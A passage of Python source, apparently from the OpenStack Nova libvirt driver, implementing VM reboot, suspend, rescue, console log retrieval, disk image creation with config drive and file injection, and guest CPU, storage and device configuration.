# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# NOTE (rmk): Establish a temporary mirror of our root disk and
# issue an abort once we have a complete copy.
domain.blockRebase(disk_path, disk_delta, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW)
while _wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path, 0)
libvirt_utils.chown(disk_delta, os.getuid())
finally:
self._conn.defineXML(xml)
# Convert the delta (CoW) image with a backing file to a flat
# image with no backing file.
libvirt_utils.extract_snapshot(disk_delta, 'qcow2', None,
out_path, image_format)
def reboot(self, context, instance, network_info, reboot_type='SOFT',
block_device_info=None, bad_volumes_callback=None):
"""Reboot a virtual machine, given an instance reference."""
if reboot_type == 'SOFT':
# NOTE(vish): This will attempt to do a graceful shutdown/restart.
if self._soft_reboot(instance):
LOG.info(_("Instance soft rebooted successfully."),
instance=instance)
return
else:
LOG.warn(_("Failed to soft reboot instance."),
instance=instance)
return self._hard_reboot(context, instance, network_info,
block_device_info)
def _soft_reboot(self, instance):
"""Attempt to shutdown and restart the instance gracefully.
We use shutdown and create here so we can return if the guest
responded and actually rebooted. Note that this method only
        succeeds if the guest responds to ACPI. Therefore we return
success or failure so we can fall back to a hard reboot if
necessary.
:returns: True if the reboot succeeded
"""
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
old_domid = dom.ID()
# NOTE(vish): This check allows us to reboot an instance that
# is already shutdown.
if state == power_state.RUNNING:
dom.shutdown()
        # NOTE(vish): This actually could take slightly longer than the
# FLAG defines depending on how long the get_info
# call takes to return.
for x in xrange(CONF.libvirt_wait_soft_reboot_seconds):
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
new_domid = dom.ID()
# NOTE(ivoks): By checking domain IDs, we make sure we are
# not recreating domain that's already running.
if old_domid != new_domid:
if state in [power_state.SHUTDOWN,
power_state.CRASHED]:
LOG.info(_("Instance shutdown successfully."),
instance=instance)
self._create_domain(domain=dom)
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running, instance)
timer.start(interval=0.5).wait()
return True
else:
LOG.info(_("Instance may have been rebooted during soft "
"reboot, so return now."), instance=instance)
return True
greenthread.sleep(1)
return False
def _hard_reboot(self, context, instance, network_info,
block_device_info=None):
"""Reboot a virtual machine, given an instance reference.
Performs a Libvirt reset (if supported) on the domain.
If Libvirt reset is unavailable this method actually destroys and
re-creates the domain to ensure the reboot happens, as the guest
OS cannot ignore this action.
If xml is set, it uses the passed in xml in place of the xml from the
existing domain.
"""
self._destroy(instance)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
# NOTE(vish): This could generate the wrong device_format if we are
# using the raw backend and the images don't exist yet.
# The create_images_and_backing below doesn't properly
# regenerate raw backend images, however, so when it
# does we need to (re)generate the xml after the images
# are in place.
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
# NOTE (rmk): Re-populate any missing backing files.
disk_info_json = self.get_instance_disk_info(instance['name'], xml,
block_device_info)
self._create_images_and_backing(context, instance, disk_info_json)
# Initialize all the necessary networking, block devices and
# start the instance.
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
def _wait_for_reboot():
"""Called at an interval until the VM is running again."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance rebooted successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_reboot)
timer.start(interval=0.5).wait()
def pause(self, instance):
"""Pause VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.suspend()
def unpause(self, instance):
"""Unpause paused VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.resume()
def power_off(self, instance):
"""Power off the specified instance."""
self._destroy(instance)
def power_on(self, context, instance, network_info,
block_device_info=None):
"""Power on the specified instance."""
# We use _hard_reboot here to ensure that all backing files,
# network, and block device connections, etc. are established
# and available before we attempt to start the instance.
self._hard_reboot(context, instance, network_info, block_device_info)
def suspend(self, instance):
"""Suspend the specified instance."""
dom = self._lookup_by_name(instance['name'])
dom.managedSave(0)
def resume(self, instance, network_info, block_device_info=None):
"""resume the specified instance."""
xml = self._get_existing_domain_xml(instance, network_info,
block_device_info)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
if self.instance_exists(instance['name']):
domain = self._lookup_by_name(instance['name'])
state = LIBVIRT_POWER_STATE[domain.info()[0]]
ignored_states = (power_state.RUNNING,
power_state.SUSPENDED,
power_state.NOSTATE,
power_state.PAUSED)
if state in ignored_states:
return
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self._hard_reboot(context, instance, network_info, block_device_info)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Loads a VM using rescue images.
A rescue is normally performed when something goes wrong with the
primary images and data needs to be corrected/recovered. Rescuing
        should not edit or override the original image, only allow for
data recovery.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml = self._get_existing_domain_xml(instance, network_info)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
libvirt_utils.write_to_file(unrescue_xml_path, unrescue_xml)
rescue_images = {
'image_id': CONF.rescue_image_id or instance['image_ref'],
'kernel_id': CONF.rescue_kernel_id or instance['kernel_id'],
'ramdisk_id': CONF.rescue_ramdisk_id or instance['ramdisk_id'],
}
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
None,
image_meta,
rescue=True)
self._create_image(context, instance,
disk_info['mapping'],
'.rescue', rescue_images,
network_info=network_info,
admin_pass=rescue_password)
xml = self.to_xml(instance, network_info, disk_info,
image_meta, rescue=rescue_images,
write_to_disk=True)
self._destroy(instance)
self._create_domain(xml)
def unrescue(self, instance, network_info):
"""Reboot the VM which is being rescued back into primary images.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
xml = libvirt_utils.load_file(unrescue_xml_path)
virt_dom = self._lookup_by_name(instance['name'])
self._destroy(instance)
self._create_domain(xml, virt_dom)
libvirt_utils.file_delete(unrescue_xml_path)
rescue_files = os.path.join(instance_dir, "*.rescue")
for rescue_file in glob.iglob(rescue_files):
libvirt_utils.file_delete(rescue_file)
def poll_rebooting_instances(self, timeout, instances):
pass
def _enable_hairpin(self, xml):
interfaces = self.get_interfaces(xml)
for interface in interfaces:
utils.execute('tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
# NOTE(ilyaalekseyev): Implementation like in multinics
# for xenapi(tr3buchet)
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
self._create_image(context, instance,
disk_info['mapping'],
network_info=network_info,
block_device_info=block_device_info,
files=injected_files,
admin_pass=admin_password)
xml = self.to_xml(instance, network_info,
disk_info, image_meta,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
LOG.debug(_("Instance is running"), instance=instance)
def _wait_for_boot():
"""Called at an interval until the VM is running."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance spawned successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_boot)
timer.start(interval=0.5).wait()
def _flush_libvirt_console(self, pty):
out, err = utils.execute('dd',
'if=%s' % pty,
'iflag=nonblock',
run_as_root=True,
check_exit_code=False)
return out
def _append_to_file(self, data, fpath):
LOG.info(_('data: %(data)r, fpath: %(fpath)r'),
{'data': data, 'fpath': fpath})
        with open(fpath, 'a+') as fp:
            fp.write(data)
        return fpath
def get_console_output(self, instance):
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
tree = etree.fromstring(xml)
console_types = {}
# NOTE(comstud): We want to try 'file' types first, then try 'pty'
# types. We can't use Python 2.7 syntax of:
# tree.find("./devices/console[@type='file']/source")
# because we need to support 2.6.
console_nodes = tree.findall('./devices/console')
for console_node in console_nodes:
console_type = console_node.get('type')
console_types.setdefault(console_type, [])
console_types[console_type].append(console_node)
# If the guest has a console logging to a file prefer to use that
if console_types.get('file'):
for file_console in console_types.get('file'):
source_node = file_console.find('./source')
if source_node is None:
continue
path = source_node.get("path")
if not path:
continue
libvirt_utils.chown(path, os.getuid())
with libvirt_utils.file_open(path, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp,
MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes '
'ignored'), remaining, instance=instance)
return log_data
# Try 'pty' types
if console_types.get('pty'):
for pty_console in console_types.get('pty'):
source_node = pty_console.find('./source')
if source_node is None:
continue
pty = source_node.get("path")
if not pty:
continue
break
else:
msg = _("Guest does not have a console available")
raise exception.NovaException(msg)
self._chown_console_log_for_instance(instance)
data = self._flush_libvirt_console(pty)
console_log = self._get_console_log_path(instance)
fpath = self._append_to_file(data, console_log)
with libvirt_utils.file_open(fpath, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp, MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes ignored'),
remaining, instance=instance)
return log_data
@staticmethod
def get_host_ip_addr():
return CONF.my_ip
def get_vnc_console(self, instance):
def get_vnc_port_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = minidom.parseString(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'vnc':
return graphic.getAttribute('port')
port = get_vnc_port_for_instance(instance['name'])
host = CONF.vncserver_proxyclient_address
return {'host': host, 'port': port, 'internal_access_path': None}
@exception.wrap_exception()
def get_spice_console(self, instance):
def get_spice_ports_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = minidom.parseString(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'spice':
return (graphic.getAttribute('port'),
graphic.getAttribute('tlsPort'))
return (None, None)
ports = get_spice_ports_for_instance(instance['name'])
host = CONF.spice.server_proxyclient_address
return {'host': host, 'port': ports[0],
'tlsPort': ports[1], 'internal_access_path': None}
@staticmethod
def _supports_direct_io(dirpath):
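        # Probes O_DIRECT support by opening a scratch file
        # ('.directio.test') in dirpath with os.O_DIRECT; EINVAL from the
        # open indicates the filesystem (e.g. GlusterFS over FUSE, as noted
        # in disk_cachemode above) does not support direct I/O.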
if not hasattr(os, 'O_DIRECT'):
LOG.debug("This python runtime does not support direct I/O")
return False
testfile = os.path.join(dirpath, ".directio.test")
hasDirectIO = True
try:
f = os.open(testfile, os.O_CREAT | os.O_WRONLY | os.O_DIRECT)
os.close(f)
LOG.debug(_("Path '%(path)s' supports direct I/O") %
{'path': dirpath})
except OSError as e:
if e.errno == errno.EINVAL:
LOG.debug(_("Path '%(path)s' does not support direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
hasDirectIO = False
else:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking "
"direct I/O: '%(ex)s'") %
{'path': dirpath, 'ex': str(e)})
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
finally:
try:
os.unlink(testfile)
except Exception:
pass
return hasDirectIO
@staticmethod
def _create_local(target, local_size, unit='G',
fs_format=None, label=None):
"""Create a blank image of specified size."""
if not fs_format:
fs_format = CONF.default_ephemeral_format
if not CONF.libvirt_images_type == "lvm":
libvirt_utils.create_image('raw', target,
'%d%c' % (local_size, unit))
if fs_format:
utils.mkfs(fs_format, target, label)
def _create_ephemeral(self, target, ephemeral_size, fs_label, os_type):
self._create_local(target, ephemeral_size)
disk.mkfs(os_type, fs_label, target)
@staticmethod
def _create_swap(target, swap_mb):
"""Create a swap file of specified size."""
libvirt_utils.create_image('raw', target, '%dM' % swap_mb)
utils.mkfs('swap', target)
@staticmethod
def _get_console_log_path(instance):
return os.path.join(libvirt_utils.get_instance_path(instance),
'console.log')
def _chown_console_log_for_instance(self, instance):
console_log = self._get_console_log_path(instance)
if os.path.exists(console_log):
libvirt_utils.chown(console_log, os.getuid())
def _create_image(self, context, instance,
disk_mapping, suffix='',
disk_images=None, network_info=None,
block_device_info=None, files=None, admin_pass=None):
if not suffix:
suffix = ''
booted_from_volume = (
(not bool(instance.get('image_ref')))
or 'disk' not in disk_mapping
)
# syntactic nicety
def basepath(fname='', suffix=suffix):
return os.path.join(libvirt_utils.get_instance_path(instance),
fname + suffix)
def image(fname, image_type=CONF.libvirt_images_type):
return self.image_backend.image(instance,
fname + suffix, image_type)
def raw(fname):
return image(fname, image_type='raw')
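        # basepath() joins file names under the instance directory, image()
        # returns a backend image object for the configured
        # CONF.libvirt_images_type, and raw() forces the raw backend, which
        # is used for the kernel and ramdisk images below.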
# ensure directories exist and are writable
fileutils.ensure_tree(basepath(suffix=''))
LOG.info(_('Creating image'), instance=instance)
# NOTE(dprince): for rescue console.log may already exist... chown it.
self._chown_console_log_for_instance(instance)
        # NOTE(vish): No need to add the suffix to console.log
libvirt_utils.write_to_file(
self._get_console_log_path(instance), '', 7)
if not disk_images:
disk_images = {'image_id': instance['image_ref'],
'kernel_id': instance['kernel_id'],
'ramdisk_id': instance['ramdisk_id']}
if disk_images['kernel_id']:
fname = imagecache.get_cache_fname(disk_images, 'kernel_id')
raw('kernel').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['kernel_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
if disk_images['ramdisk_id']:
fname = imagecache.get_cache_fname(disk_images, 'ramdisk_id')
raw('ramdisk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['ramdisk_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
inst_type = flavors.extract_flavor(instance)
# NOTE(ndipanov): Even if disk_mapping was passed in, which
# currently happens only on rescue - we still don't want to
# create a base image.
if not booted_from_volume:
root_fname = imagecache.get_cache_fname(disk_images, 'image_id')
size = instance['root_gb'] * 1024 * 1024 * 1024
if size == 0 or suffix == '.rescue':
size = None
image('disk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=root_fname,
size=size,
image_id=disk_images['image_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
# Lookup the filesystem type if required
os_type_with_default = instance['os_type']
if not os_type_with_default:
os_type_with_default = 'default'
ephemeral_gb = instance['ephemeral_gb']
if 'disk.local' in disk_mapping:
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral0',
os_type=instance["os_type"])
fname = "ephemeral_%s_%s" % (ephemeral_gb, os_type_with_default)
size = ephemeral_gb * 1024 * 1024 * 1024
image('disk.local').cache(fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=ephemeral_gb)
for eph in driver.block_device_info_get_ephemerals(block_device_info):
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral%d' % eph['num'],
os_type=instance["os_type"])
size = eph['size'] * 1024 * 1024 * 1024
fname = "ephemeral_%s_%s" % (eph['size'], os_type_with_default)
image(blockinfo.get_eph_disk(eph)).cache(
fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=eph['size'])
if 'disk.swap' in disk_mapping:
mapping = disk_mapping['disk.swap']
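            # Swap sizing precedence: a usable swap block device wins;
            # otherwise fall back to the flavor's swap size (in MB) unless a
            # volume is already mapped at the swap device. Nothing is created
            # while swap_mb remains 0.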
swap_mb = 0
swap = driver.block_device_info_get_swap(block_device_info)
if driver.swap_is_usable(swap):
swap_mb = swap['swap_size']
elif (inst_type['swap'] > 0 and
not block_device.volume_in_mapping(
mapping['dev'], block_device_info)):
swap_mb = inst_type['swap']
if swap_mb > 0:
size = swap_mb * 1024 * 1024
image('disk.swap').cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=size,
swap_mb=swap_mb)
# Config drive
if configdrive.required_by(instance):
LOG.info(_('Using config drive'), instance=instance)
extra_md = {}
if admin_pass:
extra_md['admin_pass'] = admin_pass
inst_md = instance_metadata.InstanceMetadata(instance,
content=files, extra_md=extra_md, network_info=network_info)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
configdrive_path = basepath(fname='disk.config')
LOG.info(_('Creating config drive at %(path)s'),
{'path': configdrive_path}, instance=instance)
try:
cdb.make_drive(configdrive_path)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Creating config drive failed '
'with error: %s'),
e, instance=instance)
# File injection
elif CONF.libvirt_inject_partition != -2:
target_partition = None
if not instance['kernel_id']:
target_partition = CONF.libvirt_inject_partition
if target_partition == 0:
target_partition = None
if CONF.libvirt_type == 'lxc':
target_partition = None
if CONF.libvirt_inject_key and instance['key_data']:
key = str(instance['key_data'])
else:
key = None
net = netutils.get_injected_network_template(network_info)
metadata = instance.get('metadata')
if not CONF.libvirt_inject_password:
admin_pass = None
if any((key, net, metadata, admin_pass, files)):
# If we're not using config_drive, inject into root fs
injection_path = image('disk').path
img_id = instance['image_ref']
for inj, val in [('key', key),
('net', net),
('metadata', metadata),
('admin_pass', admin_pass),
('files', files)]:
if val:
LOG.info(_('Injecting %(inj)s into image '
'%(img_id)s'),
{'inj': inj, 'img_id': img_id},
instance=instance)
try:
disk.inject_data(injection_path,
key, net, metadata, admin_pass, files,
partition=target_partition,
use_cow=CONF.use_cow_images,
mandatory=('files',))
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Error injecting data into image '
'%(img_id)s (%(e)s)'),
{'img_id': img_id, 'e': e},
instance=instance)
if CONF.libvirt_type == 'uml':
libvirt_utils.chown(image('disk').path, 'root')
def get_host_capabilities(self):
"""Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
"""
if not self._caps:
xmlstr = self._conn.getCapabilities()
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
return self._caps
def get_host_uuid(self):
"""Returns a UUID representing the host."""
caps = self.get_host_capabilities()
return caps.host.uuid
def get_host_cpu_for_guest(self):
"""Returns an instance of config.LibvirtConfigGuestCPU
representing the host's CPU model & topology with
policy for configuring a guest to match
"""
caps = self.get_host_capabilities()
hostcpu = caps.host.cpu
guestcpu = vconfig.LibvirtConfigGuestCPU()
guestcpu.model = hostcpu.model
guestcpu.vendor = hostcpu.vendor
guestcpu.arch = hostcpu.arch
guestcpu.match = "exact"
for hostfeat in hostcpu.features:
guestfeat = vconfig.LibvirtConfigGuestCPUFeature(hostfeat.name)
guestfeat.policy = "require"
guestcpu.features.append(guestfeat)
return guestcpu
def get_guest_cpu_config(self):
mode = CONF.libvirt_cpu_mode
model = CONF.libvirt_cpu_model
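        # For illustration: with libvirt_type=kvm and neither option set,
        # mode defaults to "host-model" and no model name is used;
        # libvirt_cpu_mode="custom" additionally requires libvirt_cpu_model
        # (a name from cpu_map.xml, e.g. "Nehalem").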
if mode is None:
if CONF.libvirt_type == "kvm" or CONF.libvirt_type == "qemu":
mode = "host-model"
else:
mode = "none"
if mode == "none":
return None
if CONF.libvirt_type != "kvm" and CONF.libvirt_type != "qemu":
msg = _("Config requested an explicit CPU model, but "
"the current libvirt hypervisor '%s' does not "
"support selecting CPU models") % CONF.libvirt_type
raise exception.Invalid(msg)
if mode == "custom" and model is None:
msg = _("Config requested a custom CPU model, but no "
"model name was provided")
raise exception.Invalid(msg)
elif mode != "custom" and model is not None:
msg = _("A CPU model name should not be set when a "
"host CPU model is requested")
raise exception.Invalid(msg)
LOG.debug(_("CPU mode '%(mode)s' model '%(model)s' was chosen")
% {'mode': mode, 'model': (model or "")})
# TODO(berrange): in the future, when MIN_LIBVIRT_VERSION is
# updated to be at least this new, we can kill off the elif
# blocks here
if self.has_min_version(MIN_LIBVIRT_HOST_CPU_VERSION):
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.mode = mode
cpu.model = model
elif mode == "custom":
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.model = model
elif mode == "host-model":
cpu = self.get_host_cpu_for_guest()
elif mode == "host-passthrough":
msg = _("Passthrough of the host CPU was requested but "
"this libvirt version does not support this feature")
raise exception.NovaException(msg)
return cpu
def get_guest_disk_config(self, instance, name, disk_mapping, inst_type,
image_type=None):
image = self.image_backend.image(instance,
name,
image_type)
disk_info = disk_mapping[name]
return image.libvirt_info(disk_info['bus'],
disk_info['dev'],
disk_info['type'],
self.disk_cachemode,
inst_type['extra_specs'],
self.get_hypervisor_version())
def get_guest_storage_config(self, instance, image_meta,
disk_info,
rescue, block_device_info,
inst_type):
devices = []
disk_mapping = disk_info['mapping']
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
if CONF.libvirt_type == "lxc":
fs = vconfig.LibvirtConfigGuestFilesys()
fs.source_type = "mount"
fs.source_dir = os.path.join(
libvirt_utils.get_instance_path(instance), 'rootfs')
devices.append(fs)
else:
if rescue:
diskrescue = self.get_guest_disk_config(instance,
'disk.rescue',
disk_mapping,
inst_type)
devices.append(diskrescue)
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
else:
if 'disk' in disk_mapping:
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
if 'disk.local' in disk_mapping:
disklocal = self.get_guest_disk_config(instance,
'disk.local',
disk_mapping,
inst_type)
devices.append(disklocal)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_ephemeral_device':
'/dev/' + disklocal.target_dev})
for eph in driver.block_device_info_get_ephemerals(
block_device_info):
diskeph = self.get_guest_disk_config(
instance,
blockinfo.get_eph_disk(eph),
disk_mapping, inst_type)
devices.append(diskeph)
if 'disk.swap' in disk_mapping:
diskswap = self.get_guest_disk_config(instance,
'disk.swap',
disk_mapping,
inst_type)
devices.append(diskswap)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_swap_device': '/dev/' + diskswap.target_dev})
for vol in block_device_mapping:
connection_info = vol['connection_info']
info = disk_mapping[vol['mount_device']]
cfg = self.volume_driver_method('connect_volume',
connection_info,
info)
devices.append(cfg)
if 'disk.config' in disk_mapping:
diskconfig = self.get_guest_disk_config(instance,
'disk.config',
disk_mapping,
inst_type,
'raw')
devices.append(diskconfig)
for d in devices:
self.set_cache_mode(d)
return devices
def get_guest_config_sysinfo(self, instance):
sysinfo = vconfig.LibvirtConfigGuestSysinfo()
sysinfo.system_manufacturer = version.vendor_string()
sysinfo.system_product = version.product_string()
sysinfo.system_version = version.version_string_with_package()
sysinfo.system_serial = self.get_host_uuid()
sysinfo.system_uuid = instance['uuid']
return sysinfo
def get_guest_config(self, instance, network_info, image_meta,
disk_info, rescue=None, block_device_info=None):
"""Get config data for parameters.
:param rescue: optional dictionary that should contain the key
'ramdisk_id' if a ramdisk is needed for the rescue image and
'kernel_id' if a kernel is needed for the rescue image.
"""
inst_type = self.virtapi.instance_type_get(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
inst_path = libvirt_utils.get_instance_path(instance)
disk_mapping = disk_info['mapping']
CONSOLE = "console=tty0 console=ttyS0"
guest = vconfig.LibvirtConfigGuest()
guest.virt_type = CONF.libvirt_type
guest.name = instance['name']
guest.uuid = instance['uuid']
guest.memory = inst_type['memory_mb'] * 1024
guest.vcpus = inst_type['vcpus']
guest.cpuset = CONF.vcpu_pin_set
quota_items = ['cpu_shares', 'cpu_period', 'cpu_quota']
for key, value in inst_type['extra_specs'].iteritems():
scope = key.split(':')
if len(scope) > 1 and scope[0] == 'quota':
if scope[1] in quota_items:
setattr(guest, scope[1], value)
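        # For example (hypothetical flavor), an extra_spec of
        # "quota:cpu_shares" = "2048" sets guest.cpu_shares = "2048";
        # keys outside the "quota:" scope or not listed in quota_items
        # are ignored.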
guest.cpu = self.get_guest_cpu_config()
if 'root' in disk_mapping and disk_mapping['root']['dev'] is not None:
root_device_name = "/dev/" + disk_mapping['root']['dev']
else:
root_device_name = None
if root_device_name:
# NOTE(yamahata):
# for nova.api.ec2.cloud.CloudController.get_metadata()
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'root_device_name': root_device_name})
guest.os_type = vm_mode.get_from_instance(instance)
if guest.os_type is None:
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
elif CONF.libvirt_type == "xen":
guest.os_type = vm_mode.XEN
else:
guest.os_type = vm_mode.HVM
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.HVM:
guest.os_loader = CONF.xen_hvmloader_path
if CONF.libvirt_type in ("kvm", "qemu"):
caps = self.get_host_capabilities()
if caps.host.cpu.arch in ("i686", "x86_64"):
guest.sysinfo = self.get_guest_config_sysinfo(instance)
guest.os_smbios = vconfig.LibvirtConfigGuestSMBIOS()
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
guest.os_init_path = "/sbin/init"
guest.os_cmdline = CONSOLE
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
guest.os_kernel = "/usr/bin/linux"
guest.os_root = root_device_name
else:
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.XEN:
guest.os_root = root_device_name
else:
guest.os_type = vm_mode.HVM
if rescue:
if rescue.get('kernel_id'):
guest.os_kernel = os.path.join(inst_path, "kernel.rescue")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if rescue.get('ramdisk_id'):
guest.os_initrd = os.path.join(inst_path, "ramdisk.rescue")
elif instance['kernel_id']:
guest.os_kernel = os.path.join(inst_path, "kernel")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s %s" % (root_device_name,
CONSOLE))
if instance['ramdisk_id']:
guest.os_initrd = os.path.join(inst_path, "ramdisk")
else:
guest.os_boot_dev = "hd"
if CONF.libvirt_type != "lxc" and CONF.libvirt_type != "uml":
guest.acpi = True
guest.apic = True
clk = vconfig.LibvirtConfigGuestClock()
clk.offset = "utc"
guest.set_clock(clk)
if CONF.libvirt_type == "kvm":
# TODO(berrange) One day this should be per-guest
# OS type configurable
tmpit = vconfig.LibvirtConfigGuestTimer()
tmpit.name = "pit"
tmpit.tickpolicy = "delay"
tmrtc = vconfig.LibvirtConfigGuestTimer()
tmrtc.name = "rtc"
tmrtc.tickpolicy = "catchup"
clk.add_timer(tmpit)
clk.add_timer(tmrtc)
for cfg in self.get_guest_storage_config(instance,
image_meta,
disk_info,
rescue,
block_device_info,
inst_type):
guest.add_device(cfg)
for (network, mapping) in network_info:
cfg = self.vif_driver.get_config(instance,
network, mapping,
image_meta,
inst_type)
guest.add_device(cfg)
if CONF.libvirt_type == "qemu" or CONF.libvirt_type == "kvm":
# The QEMU 'pty' driver throws away any data if no
# client app is connected. Thus we can't get away
# with a single type=pty console. Instead we have
# to configure two separate consoles.
consolelog = vconfig.LibvirtConfigGuestSerial()
consolelog.type = "file"
consolelog.source_path = self._get_console_log_path(instance)
guest.add_device(consolelog)
consolepty = vconfig.LibvirtConfigGuestSerial()
consolepty.type = "pty"
guest.add_device(consolepty)
else:
consolepty = vconfig.LibvirtConfigGuestConsole()
consolepty.type = "pty"
guest.add_device(consolepty)
# We want a tablet if VNC is enabled,
# or SPICE is enabled and the SPICE agent is disabled
# NB: this implies that if both SPICE + VNC are enabled
# at the same time, we'll get the tablet whether the
# SPICE agent is used or not.
need_usb_tablet = False
if CONF.vnc_enabled:
need_usb_tablet = CONF.use_usb_tablet
elif CONF.spice.enabled and not CONF.spice.agent_enabled:
need_usb_tablet = CONF.use_usb_tablet
if need_usb_tablet and guest.os_type == vm_mode.HVM:
tablet = vconfig.LibvirtConfigGuestInput()
tablet.type = "tablet"
tablet.bus = "usb"
guest.add_device(tablet)
if CONF.spice.enabled and CONF.spice.agent_enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
channel = vconfig.LibvirtConfigGuestChannel()
channel.target_name = "com.redhat.spice.0"
guest.add_device(channel)
# NB some versions of libvirt support both SPICE and VNC
# at the same time. We're not trying to second guess which
# those versions are. We'll just let libvirt report the
# errors appropriately if the user enables both.
if CONF.vnc_enabled and CONF.libvirt_type not in ('lxc', 'uml'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "vnc"
graphics.keymap = CONF.vnc_keymap
graphics.listen = CONF.vncserver_listen
guest.add_device(graphics)
if CONF.spice.enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "spice"
graphics.keymap = CONF.spice.keymap
graphics.listen = CONF.spice.server_listen
guest.add_device(graphics)
return guest
def to_xml(self, instance, network_info, disk_info,
image_meta=None, rescue=None,
block_device_info=None, write_to_disk=False):
LOG.debug(_('Start to_xml instance=%(instance)s '
